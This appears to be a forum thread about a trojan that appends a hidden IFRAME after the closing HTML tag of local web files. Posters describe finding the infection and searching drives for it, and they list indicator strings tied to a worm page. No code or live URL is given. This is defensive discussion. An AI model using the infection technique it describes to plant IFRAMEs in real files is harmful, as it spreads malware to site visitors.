Wouldn't this reveal itself in view source?

Sure, you can see everything with notepad or similar editor.

Let's not post any URL's please where the page pointed to may contain a virus/spyware/trojan etc.

Not everyone here has English as a first language - people may unwittingly drop that URL into a web browser.

Did you discover this one lexipixel or is it referenced on a security related wesbite somewhere?

rocknbil: yeah, you can do a view source on a file and look for the IFRAME at the very end of the file. The reasons I suggested doing a search (include all drives and subdirectories) is that the HTML files could have been infected on another machine and downloaded. In this case every file on the machine will not be affected, just the ones you've downloaded, (or in the case of a webserver, just the files that were uploaded to it).

To be clear:

The HTML, PHP and ASP files are corrupted by a trojan on an end user's machine. The danger is that the [person/user/web developer] could then upload the corrupted files to a live server, helping to spread the worm. The worm will not spread from file to file on the server (so it would be hit or miss just viewing source on a couple files on a server -- I would search all drives).

trillianjedi:
I didn't discovered it -- I just seem to be the only one wondering about it.

I found the corrupted files on one of my kids' machines after a virus clean up, (they didn't tell me until it was near dead from spawned processes: "Dad, the computer is running real slow and acting weird -- it's been getting worse and worse for a couple days".

For clean ups, I usually go in and do a search by descending date order to find the most recently modified files.

I noticed a batch of .HTML files all with the same recent date that should not have been modified at all and opened one... Found the IFRAME code at the end just cause it looked out of place after the </HTML> tag. I opened a few more and found the same, then searched the entire machine to find every file had it --- next stop Google and found a few references --- but only 2-3 in English that other people had found the same thing. Most of the rest are Chinese or Japanese posts -- I did online translation for the one from Symatec..

I posted about it in the AVG support forum (at GriSoft, that machine uses their AVG anti virus software)...Nobody ever heard of it there.

You could just search for files that contain the string "krvkr" within the text. A variant uses the same IFRAME exploit but another URL with "lovebak" in place of the "krvkr". Both reference the same "worm.htm" file.

It may be related or a side effect of Fujacks or Realor virus, but I am not really sure... I just see those names popping up in the Chine translations.